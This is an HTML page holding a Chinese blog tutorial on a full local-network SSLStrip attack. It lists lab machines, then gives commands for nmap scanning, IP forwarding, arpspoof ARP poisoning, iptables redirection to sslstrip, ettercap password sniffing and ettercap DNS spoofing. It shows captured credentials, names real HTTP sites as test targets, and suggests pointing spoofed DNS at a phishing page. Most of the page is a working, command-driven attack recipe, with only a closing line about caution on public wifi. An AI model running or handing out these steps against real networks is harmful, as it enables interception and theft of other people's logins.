
<!DOCTYPE html>
<html lang="zn-ch" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>如何进行一次完整的 SSLStrip 攻击 - 和音说</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="和音说,"> 
    <meta name="description" content="流离之人追逐幻影,简介本文将介绍在局域网内，如何监听受害者流量并通过SSLstrip攻击获取敏感信息，分为如下两步：

中间人攻击，监听受害者流量
SSLStrip攻击，获取敏感信息

实验环境



IP地址
MA,"> 
    <meta name="author" content="和音"> 
    <link rel="alternative" href="atom.xml" title="和音说" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    
    
    
    <meta name="twitter:card" content="summary"/>
    <meta name="twitter:title" content="如何进行一次完整的 SSLStrip 攻击 - 和音说"/>
    <meta name="twitter:description" content="流离之人追逐幻影,简介本文将介绍在局域网内，如何监听受害者流量并通过SSLstrip攻击获取敏感信息，分为如下两步：

中间人攻击，监听受害者流量
SSLStrip攻击，获取敏感信息

实验环境



IP地址
MA,"/>
    
    
    
    
    <meta property="og:site_name" content="和音说"/>
    <meta property="og:type" content="object"/>
    <meta property="og:title" content="如何进行一次完整的 SSLStrip 攻击 - 和音说"/>
    <meta property="og:description" content="流离之人追逐幻影,简介本文将介绍在局域网内，如何监听受害者流量并通过SSLstrip攻击获取敏感信息，分为如下两步：

中间人攻击，监听受害者流量
SSLStrip攻击，获取敏感信息

实验环境



IP地址
MA,"/>
    
<link rel="stylesheet" href="/css/diaspora.css">

<meta name="generator" content="Hexo 6.0.0"></head>

<body class="loading">
    <span id="config-title" style="display:none">和音说</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="iconfont icon-home image-icon" href="javascript:;" data-url="http://glan.site"></a>
    <div title="播放/暂停" class="iconfont icon-play"></div>
    <h3 class="subtitle">如何进行一次完整的 SSLStrip 攻击</h3>
    <div class="social">
        <div>
            <div class="share">
                <a title="获取二维码" class="iconfont icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title">如何进行一次完整的 SSLStrip 攻击</h1>
        <div class="stuff">
            <span>四月 02, 2020</span>
            
  <ul class="post-tags-list" itemprop="keywords"><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/ARP/" rel="tag">ARP</a></li><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/SSLstrip/" rel="tag">SSLstrip</a></li><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/kali/" rel="tag">kali</a></li></ul>


        </div>
        <div class="content markdown">
            <h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>本文将介绍在局域网内，如何监听受害者流量并通过SSLstrip攻击获取敏感信息，分为如下两步：</p>
<ol>
<li>中间人攻击，监听受害者流量</li>
<li>SSLStrip攻击，获取敏感信息</li>
</ol>
<h2 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a>实验环境</h2><table>
<thead>
<tr>
<th></th>
<th>IP地址</th>
<th align="left">MAC地址</th>
</tr>
</thead>
<tbody><tr>
<td>win10</td>
<td>192.168.40.1</td>
<td align="left">00:50:56:C0:00:08</td>
</tr>
<tr>
<td>网关</td>
<td>192.168.40.2</td>
<td align="left">00:50:56:E7:9F:31</td>
</tr>
<tr>
<td>kali</td>
<td>192.168.40.128</td>
<td align="left">00:0c:29:d8:d4:05</td>
</tr>
<tr>
<td>win7</td>
<td>192.168.40.130</td>
<td align="left">00:0C:29:C9:34:A6</td>
</tr>
<tr>
<td>centos7</td>
<td>192.168.40.132</td>
<td align="left">00:0c:29:bd:ef:65</td>
</tr>
</tbody></table>
<p>kali：<a target="_blank" rel="noopener" href="http://mirrors.aliyun.com/kali-images/kali-2020.1b/kali-linux-2020.1b-live-amd64.iso">kali-linux-2020.1b-live-amd64.iso</a></p>
<p>win7：<a target="_blank" rel="noopener" href="http://d0.ananas.chaoxing.com/download/16169a8dcb8f0e07b98d19c870b10ce3?fn=WIN7lite(x64)">win7</a></p>
<p>纯净虚拟机系统，使用VMware或者VirtualBox导入镜像即可。<br>采用Win7SP1镜像制作，极限精简，无多余组件，非常纯净，使用流畅，系统已激活。</p>
<h2 id="中间人攻击"><a href="#中间人攻击" class="headerlink" title="中间人攻击"></a>中间人攻击</h2><p>中间人攻击（<a target="_blank" rel="noopener" href="http://man.linuxde.net/man">man</a>-in-the-Middle Attack, MITM)，就是攻击者扮演中间人进行攻击，可以劫持一段会话，窃取凭证和其他机密信息。简而言之，所谓的MITM攻击就是通过拦截正常的网络通信数据，并进行数据篡改和嗅探，而通信的双方却毫不知情。</p>
<h3 id="ARP-（地址解析协议）"><a href="#ARP-（地址解析协议）" class="headerlink" title="ARP （地址解析协议）"></a>ARP （地址解析协议）</h3><p>ARP 协议负责通过 IP 地址找到 MAC 地址（物理地址 ），在以太网中，是利用 MAC 地址来通讯的。</p>
<p>ARP协议是这样工作的：如win10需要给win7（IP为192.168.40.130)发送数据，为了知道谁是win7，首先win10发送一个广播包给网内所有机器“谁是192.168.40.130”，正常情况其他机器忽略该消息，仅win7回复“我是192.168.40.130”，于是通信就可以开始。所有的主机维护他们自己的ARP缓存表，所以不会每一次都发送广播，ARP表中包含IP对应的MAC地址。</p>
<h4 id="如何进行ARP欺骗"><a href="#如何进行ARP欺骗" class="headerlink" title="如何进行ARP欺骗?"></a>如何进行ARP欺骗?</h4><p>例如kali需要对win7进行arp欺骗，那他就不再忽略win10发送的消息，他也会大量的发送数据包回复“啊啊啊！我才是192.168.40.130”，然后win10就会错误地建立或者更新了自己ARP表。然后win10发送数据时都发到kali那去了。</p>
<h3 id="攻击准备"><a href="#攻击准备" class="headerlink" title="攻击准备"></a>攻击准备</h3><h4 id="mac-下准备"><a href="#mac-下准备" class="headerlink" title="mac 下准备"></a>mac 下准备</h4><ol>
<li>安装 macports <a target="_blank" rel="noopener" href="https://link.jianshu.com/?t=https://www.macports.org/install.php">官网</a></li>
<li>更新 macports <code>sudo port -d selfupdate</code></li>
<li>安装 dsniff（包含 arp 攻击的工具）<code>sudo port install dsniff</code></li>
<li>安装 nmap <code>brew install nmap</code> (如果没有安装 Homebrew，可以去 <a target="_blank" rel="noopener" href="https://link.jianshu.com/?t=http://brew.sh/">Homebrew 官网</a></li>
</ol>
<h4 id="linux-下准备"><a href="#linux-下准备" class="headerlink" title="linux 下准备"></a>linux 下准备</h4><ol>
<li>安装 dsniff <code>apt-get install -y dsniff</code></li>
<li>安装 nmap <code>apt-get install -y nmap</code></li>
</ol>
<h3 id="攻击步骤"><a href="#攻击步骤" class="headerlink" title="攻击步骤"></a>攻击步骤</h3><p>一、寻找目标</p>
<p>使用nmap命令扫描局域网，获得主机列表<br> 如果所在局域网路由器地址是 192.168.40.1,可以使用 <code>nmap -sP 192.168.40.1/24</code> 扫描</p>
<p>-sP 表示使用 ping 方式扫描，192.168.40.1&#x2F;24”表示扫描”192.168.40.1-192.168.40.254”这个网段的所有机器。</p>
<p>二、开启 IP 转发</p>
<p>ARP欺骗一般目的是把自己伪装成网关，但如果不作处理，当被欺骗数据包到达后就会被本机丢弃（因为本机不是网关，不知道如何处理这类数据包），这会导致没有数据包返回给被欺骗主机，导致断网。这当然是不允许的。开启IP转发功能可以解决该问题。IP转发负责把该类数据包再转发给真正的网关处理，开启IP转发的方法。</p>
<p>mac 下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sysctl -w net.inet.ip.forwarding=1</span><br></pre></td></tr></table></figure>

<p>linux 下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo 1 &gt;/proc/sys/net/ipv4/ip_forward</span><br></pre></td></tr></table></figure>

<p>三、ARP 欺骗</p>
<p>假设被攻击的 IP 是 192.168.40.130，局域网的网关是 192.168.40.2，攻击电脑使用的网卡接口是 eth0(可以使用 <code>ifconfig</code> 命令查看）, 则欺骗命令如下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">arpspoof -i eth0 -t 192.168.40.130 192.168.40.2</span><br></pre></td></tr></table></figure>

<blockquote>
<p>arpspoof是dsniff的一个组件，主要用于进行arp欺骗使用</p>
</blockquote>
<p>成功的的话在被攻击主机上arp表如图所示</p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/image-20200402181122459.png" alt="image-20200402181122459"></p>
<blockquote>
<p>查询查询系统中缓存的ARP表<code>arp -a</code></p>
</blockquote>
<p>四、分析数据</p>
<p>如果 ARP 欺骗成功，则被攻击的设备会把所有数据先传到我们电脑上，接下来可以使用 ettercap 软件来分析数据。</p>
<h3 id="使用driftnet获取图片"><a href="#使用driftnet获取图片" class="headerlink" title="使用driftnet获取图片"></a>使用driftnet获取图片</h3><p>安装driftnet<code>apt-get install driftnet</code></p>
<p>开始获取<code>driftnet -i eth0</code></p>
<p>找一个http的网站进行测试</p>
<p><code>inurl:“http” -https</code></p>
<p>例子：<code>http://www.kan-tv.com/</code></p>
<p>Tips:https因为进行了加密不能直接获取，进行SSLStrip攻击后就可获取了</p>
<h2 id="SSLStrip-攻击"><a href="#SSLStrip-攻击" class="headerlink" title="SSLStrip 攻击"></a>SSLStrip 攻击</h2><p>2009年的黑帽大会上，一个名叫Moxie Marlinspike的研究人员,发布了一个叫sslstrip的工具。通过该工具，可以实现对ssl进行中间人攻击。</p>
<p>SSLstrip 也叫 https 降级攻击，攻击者拦截用户流量后，欺骗用户与攻击者进行 http 通信，攻击者与服务器保持正常通信 （http 或 https），从而获取用户信息。</p>
<h3 id="攻击原理"><a href="#攻击原理" class="headerlink" title="攻击原理"></a>攻击原理</h3><p>攻击者利用用户对于地址栏中HTTPS与HTTP的疏忽，将所有的HTTPS连接都用HTTP来代替。同时，与目标服务器建立正常的HTTPS连接。由于HTTP通信是没有经过加密传输的，并没有HTTPS安全，所以攻击者能轻松实施嗅探。</p>
<ol>
<li>通过中间人攻击监听 http 流量</li>
<li>更改重定向链接中的 location，替换 https 为 http，并记录</li>
<li>更改响应内容中的超链接，替换 https 为 http，并记录</li>
<li>与用户进行 http 通信，与服务器进行 https 通信（记录中本应是 https 的请求），从而明文获取用户信息</li>
</ol>
<p>Tips:</p>
<p>当用户浏览的网页中包含https协议，会被转化为http协议的请求</p>
<p>但是sslstrip也不是万能的， 假如网页中没有https， 但是js代码绑定了跳转到https的协议请求的事件，那么sslstrip就失效了</p>
<h3 id="攻击准备-1"><a href="#攻击准备-1" class="headerlink" title="攻击准备"></a>攻击准备</h3><ol>
<li><p>监听 http 流量</p>
</li>
<li><p>获取 <a target="_blank" rel="noopener" href="https://moxie.org/software/sslstrip/">sslstrip工具</a></p>
<p>Requirements<br>Python &gt;&#x3D; 2.5 (apt-get install python)<br>The python “twisted-web” module (apt-get install python-twisted-web)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">apt-get -y install python python-twisted-web</span><br><span class="line">git clone https://github.com/moxie0/sslstrip.git</span><br><span class="line">cd sslstrip &amp;&amp; python ./setup.py install</span><br></pre></td></tr></table></figure></li>
</ol>
<h3 id="攻击步骤-1"><a href="#攻击步骤-1" class="headerlink" title="攻击步骤"></a>攻击步骤</h3><p>一、开启内核转发功能保证攻击过程中被攻击者不断网</p>
<p>临时ip转发</p>
<p><code>echo 1 &gt; /proc/sys/net/ipv4/ip_forward</code></p>
<p>永久ip转发</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/sysctl.conf</span><br><span class="line">net.ipv4.ip_forward = 1		//修改值</span><br><span class="line">sysctl -p /etc/sysctl.conf	//使修改生效</span><br></pre></td></tr></table></figure>

<p>二、把流量导入到 sslstrip 程序</p>
<p>设置iptables以将HTTP通信重定向到sslstrip。<br> 输入命令： <code>iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000</code><br> 其中最后面的端口号（比如上面的 10000）就是 sslstrip 程序监听的端口号</p>
<blockquote>
<h4 id="iptables命令使用详解"><a href="#iptables命令使用详解" class="headerlink" title="iptables命令使用详解"></a>iptables命令使用详解</h4><p>iptables的主要功能是实现对网络数据包进出设备及转发的控制。当数据包需要进入设备、从设备中流出或者经该设备转发、路由时，都可以使用iptables进行控制。</p>
<p>-t:命令要操作匹配的表（net这个表表示被查询时遇到了新差生的连接包）</p>
<p>Net表有三个内建的链构成 PREROUTING(修改到来的包)、OUTPUT（修改路由之前本地的包）、POSTROUTING(修改准备出去的包)</p>
<p>-A表示在选择的链后加入更多选项</p>
<p>–p指被过滤包的协议</p>
<p>–destination-port 80指被过滤包的目的端口是80</p>
<p>-j REDIRECT –to-port 10000 将80端口的数据跳转到指定端口传输</p>
</blockquote>
<p>如果攻击完成后要删除这条记录可以输入命令 <code>iptables -t nat -D PREROUTING 1</code></p>
<p>查看 ip 转发表： <code>iptables -t nat -L</code></p>
<p>三、运行arpspoof以说服网络他们应该将流量发送给你。</p>
<p><code>arpspoof -i eth0 -t 192.168.40.130 192.168.40.2</code></p>
<blockquote>
<p>arpspoof    -i    网卡    -t    目标IP    网关    </p>
</blockquote>
<p>四、启动sslstrip</p>
<p><code>sslstrip -l 10000</code></p>
<blockquote>
<p>-w &lt;文件名&gt;，–write &#x3D; &lt;文件名&gt;指定要登录的文件（可选）。<br>-p，–post仅记录SSL POST。（默认）<br>-s，–ssl记录往返服务器的所有SSL流量。<br>-a，–all记录往返服务器的所有SSL和HTTP通信。<br>-l &lt;端口&gt;，–listen &#x3D; &lt;端口&gt;用于侦听的端口（默认为10000）。<br>-f，–favicon根据安全请求替换锁图标。<br>-k，–killsessions终止正在进行的会话。<br>-h    打印此帮助消息。</p>
<p>查看端口占用<code>lsof -i tcp:10000</code></p>
<p><code>sslstrip -a -k -f -l 10000</code></p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/image-20200402191100289.png" alt="image-20200402191100289"></p>
<p>可以看到，网页上没有任何不安全的警告或是提示，只是原先的HTTPS连接已经被HTTP连接所替换，并且为增加迷惑性，网页的图标被修改成了一个银色的锁图案。但是，假的毕竟是假的，一方面无法查看到任何证书的信息，另外如果在网址前输入https:&#x2F;&#x2F;，则网页无法发开。因此，sslstrip并不是万能的攻击方法。</p>
</blockquote>
<h3 id="使用ettercap对目标主机进行arp攻击，并且开始嗅探密码。"><a href="#使用ettercap对目标主机进行arp攻击，并且开始嗅探密码。" class="headerlink" title="使用ettercap对目标主机进行arp攻击，并且开始嗅探密码。"></a>使用ettercap对目标主机进行arp攻击，并且开始嗅探密码。</h3><blockquote>
<p>终端界面嗅探密码<code>ettercap -Tq -i eth0</code></p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">-P  使用插件</span><br><span class="line">-T  使用基于文本界面</span><br><span class="line">-q  启动安静模式（不回显）</span><br><span class="line">-M  启动ARP欺骗攻击</span><br></pre></td></tr></table></figure>
</blockquote>
<p>我们使用ettercap的GTK+ GUI图像界面<code>ettercap -G</code></p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/006DGX4tly1forn6xo9ynj30me0ehtaf.jpg" alt="1"></p>
<p>选择Sniff—-Unified-sniffing，然后选择网卡：eth0(我这里是eth0，大家根据情况选择)。</p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/1579317-20190505005253674-1007015553.png" alt="img"></p>
<p>然后Hosts——Scan for hosts——Hosts list</p>
<p>我们的目标主机ip(192.168.40.130)选定目标主机，然后点add to target 1，将目标主机添加到目标；选定路由，点add to target 2，将路由添加到目标2</p>
<p>添加成功后，点击Mitm——ARP posoning ，勾选sniff remote connections。</p>
<p>之后start——start sniffing开始监听。</p>
<p>点击view——connections查看被攻击机访问的IP，端口，协议，发送和接收的数据包大小。</p>
<p>点击view——profiles查看被攻击机访问的链接。在下方可以查看更清晰的链接访问情况。</p>
<p>当然你也可以通过双击链接来查看profiles details，即访问网站的具体情况。</p>
<p>在这里，如果被攻击机输入密码登陆某一网站，我们可以检测到登陆的用户名及其密码。</p>
<p>这是刚刚检测到的一个用户名和登陆密码。这个网站完全没有对密码进行加密操作，出来的结果也是明文显示的。<br><a target="_blank" rel="noopener" href="http://ww1.sinaimg.cn/large/006DGX4tly1forn7tt3plj306h00g3ya.jpg"><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/006DGX4tly1forn7tt3plj306h00g3ya.jpg" alt="3"></a></p>
<p>这是另外一个站检测出来的，对密码进行了加密。<br><a target="_blank" rel="noopener" href="http://ww1.sinaimg.cn/large/006DGX4tly1forn8hy09dj30l2015747.jpg"><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/006DGX4tly1forn8hy09dj30l2015747.jpg" alt="4"></a></p>
<p>Tips：其实一个网站如果使用的都是https协议，那么安全性一般做的比较好，数据进行了加密的，也就是说你即使已经把https降低为http，即使捕获到了密码，你也不可能轻易解密的出来。</p>
<h4 id="测试网址"><a href="#测试网址" class="headerlink" title="测试网址"></a>测试网址</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://www.freemojo.com                                 //http密码明文未加密</span><br><span class="line">http://bbs.ylnet.com.cn/forum.php                 //http密码加密了</span><br><span class="line">http://www.discuz.net/forum.php                   //https密码未加密</span><br></pre></td></tr></table></figure>

<h3 id="Dns欺骗"><a href="#Dns欺骗" class="headerlink" title="Dns欺骗"></a>Dns欺骗</h3><p><code>leafpad /etc/ettercap/etter.dns</code></p>
<p>在微软处添加：</p>
<p>&#96;<a target="_blank" rel="noopener" href="http://www.baidu.com/">www.baidu.com</a> A 192.168.40.132</p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/image-20200402231357902.png" alt="image-20200402231357902"></p>
<p>ettercap -G（进入图形界面）</p>
<p>重复之前的步骤ARP欺骗的步骤，在start sniffing之前添加一个插件</p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/1579317-20190505005436537-613190724.png" alt="img"></p>
<p>双击启动dns_spoof</p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/1579317-20190505005442442-1221575293.png" alt="img"></p>
<p>开始嗅探后，我们在目标机中ping一下百度</p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/image-20200402231259745.png" alt="image-20200402231259745"></p>
<p>欺骗成功，如果将192.168.40.132改为钓鱼页面，就可以欺骗到用户账号密码</p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/image-20200402231157009.png" alt="image-20200402231157009"></p>
<p>最后提醒大家，连接公共wifi时一定要小心！</p>
<h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h2><p> <a target="_blank" rel="noopener" href="https://www.jianshu.com/p/983d43b4ba1e">如何进行一次完整的 SSLStrip</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/paperpen/p/10810690.html">ARP欺骗之ettercap图形化界面</a></p>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/bbf50dace855">APR攻击（Arpspoof）</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/li_101357/article/details/78416813">linux ip 转发设置 ip_forward、ip_forward与路由转发</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/kuiguowei/article/details/79070945">HTTP&amp;HTTPS账号密码获取与ettercap局域网内DNS欺骗</a></p>
<p><a target="_blank" rel="noopener" href="https://www.bingyublog.com/2018/02/23/%E4%BD%BF%E7%94%A8ssltrip%E7%AA%81%E7%A0%B4ssl%E5%8A%A0%E5%AF%86%E6%88%AA%E8%8E%B7%E5%AF%86%E7%A0%81/">使用ssltrip突破ssl加密截获密码</a></p>
<p><a target="_blank" rel="noopener" href="https://moxie.org/software/sslstrip/">sslstrip</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/5929.html">利用sslstrip和ettercap突破ssl嗅探密码</a></p>
<p><a target="_blank" rel="noopener" href="https://www.linuxde.net/2011/11/2522.html">针对SSL的中间人攻击演示和防范</a></p>
<p><a target="_blank" rel="noopener" href="https://tools.kali.org/information-gathering/sslstrip">sslstrip Package Description</a></p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title="0" data-url="https://cdn.jsdelivr.net/gh/GLSakura/CDN@3.1/mp3/MOM - 蜡笔小心.mp3"></li>
                        
                    
                        
                            <li title="1" data-url="https://cdn.jsdelivr.net/gh/GLSakura/CDN@3.1/mp3/犯错  - 小眼鑫.mp3"></li>
                        
                    
                        
                            <li title="2" data-url="https://cdn.jsdelivr.net/gh/GLSakura/CDN@3.1/mp3/非酋 (王柏鸿 Remix) - 薛明媛.mp3"></li>
                        
                    
                        
                            <li title="3" data-url="https://cdn.jsdelivr.net/gh/GLSakura/CDN@3.1/mp3/黑咻狂想曲（Cover：艾索） - 玖肆仟.mp3"></li>
                        
                    
                        
                            <li title="4" data-url="https://cdn.jsdelivr.net/gh/GLSakura/CDN@3.1/mp3/忽而今夏（Cover：汪苏泷） - 耳朵玥.mp3"></li>
                        
                    
                        
                            <li title="5" data-url="https://cdn.jsdelivr.net/gh/GLSakura/CDN@3.1/mp3/星茶会 - 灰澈.mp3"></li>
                        
                    
                        
                            <li title="6" data-url="https://cdn.jsdelivr.net/gh/GLSakura/CDN@3.1/mp3/坠落星空 - 小星星Aurora.mp3"></li>
                        
                    
                        
                            <li title="7" data-url="https://cdn.jsdelivr.net/gh/GLSakura/CDN@3.1/mp3/最甜情歌 (女生版)  - 一玟.mp3"></li>
                        
                    
                        
                            <li title="8" data-url="https://api.uomg.com/api/rand.music"></li>
                        
                    
                </ul>
            
        </div>
        
    <div id="gitalk-container" class="comment link"
		data-enable="false"
        data-ae="false"
        data-ci=""
        data-cs=""
        data-r=""
        data-o=""
        data-a=""
        data-d="false"
    >查看评论</div>


    </div>
    
</div>


    </div>
</div>
</body>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/typed.js"></script>
<script src="/js/diaspora.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>






</html>
